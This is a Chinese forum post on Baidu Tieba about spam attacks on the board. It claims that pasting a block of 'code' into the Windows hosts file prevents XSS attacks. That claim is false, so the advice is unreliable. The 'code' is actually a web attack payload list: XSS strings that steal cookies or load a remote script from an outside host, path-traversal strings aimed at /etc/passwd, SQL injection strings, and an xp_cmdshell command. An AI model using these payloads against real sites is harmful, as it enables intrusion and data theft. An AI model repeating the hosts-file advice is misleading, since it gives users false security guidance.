捋哥 捋哥
关注数: 34 粉丝数: 43 发帖数: 4,363 关注贴吧数: 13
【关于最近的代码爆吧问题】0.0 在windows中找到 C:\Windows\System32\drivers\etc\hosts, 然后使用记事本 文段编辑器 写字板都可以打开 打开这个文件 然后添加 下面给出的代码 理论上来讲就可以回避此类的XXS攻击了 >alert(document.cookie) =’>alert(document.cookie) alert(document.cookie) alert(vulnerable) alert(’XSS’) alert(/"Vulnerable/").jsp " ../../../../../../../etc/passwd ../../../../../windows/win.ini /index.html ?.jsp ?.jsp <script>alert(’Vulnerable’);</script> alert(’Vulnerable’) ?sql_debug=1 a\.aspx a.jsp/alert(’Vulnerable’) a/ a?alert(’Vulnerable’) ">alert(’Vulnerable’) ’;exec master..xp_cmdshell ’dir c: > c:/inetpub/wwwroot/?.txt’--&& "> & &SESSION_ID={SESSION_ID}&SESSION_ID= 1 union all select pass,0,0,0,0 from customers where fname= ../../../../../../../../etc/passwd ../../../../../../../../windows/system.ini /../../../../../../../../windows/system.ini ’’;!--"=&{()} #106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;S')> "";’ > out a=/XSS/alert(a.source) http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb></SCRIPT>’"--> <IMG SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode&urlrefer=c698a21cf18111c01ad605c10c19c158"> <SCRIPT a=">" SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb"></SCRIPT> <SCRIPT =">" SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb"></SCRIPT> <SCRIPT a=">" ’’ SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb"></SCRIPT> <SCRIPT "a=’>’" SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fxss.ha.ckers.org%2Fa.js&urlrefer=86d6d62c61115e23ced039af7e0368bb"></SCRIPT> <A HREF=http://tieba.baidu.com/mo/q/checkurl?url=http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F&urlrefer=639e8668d56b21168bd004627ee52252>link</A> admin’-- ’ or 0=0 -- " or 0=0 -- or 0=0 -- ’ or 0=0 # " or 0=0 # or 0=0 # ’ or ’x’=’x " or "x"="x ’) or (’x’=’x ’ or 1=1-- " or 1=1-- or 1=1-- ’ or a=a-- " or "a"="a ’) or (’a’=’a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi’ or 1=1 -- hi’ or ’a’=’a hi’) or (’a’=’a hi") or ("a"="a
1 下一页